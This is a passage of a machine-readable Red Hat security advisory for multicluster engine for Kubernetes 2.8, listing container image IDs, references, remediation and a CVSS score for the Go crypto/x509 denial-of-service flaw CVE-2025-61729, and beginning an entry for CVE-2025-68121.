"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "RHBZ#2418462",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418462"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://go.dev/cl/725920",
"url": "https://go.dev/cl/725920"
},
{
"category": "external",
"summary": "https://go.dev/issue/76445",
"url": "https://go.dev/issue/76445"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4",
"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4155",
"url": "https://pkg.go.dev/vuln/GO-2025-4155"
}
],
"release_date": "2025-12-02T18:54:10.166000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T01:45:31+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.13/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8218"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
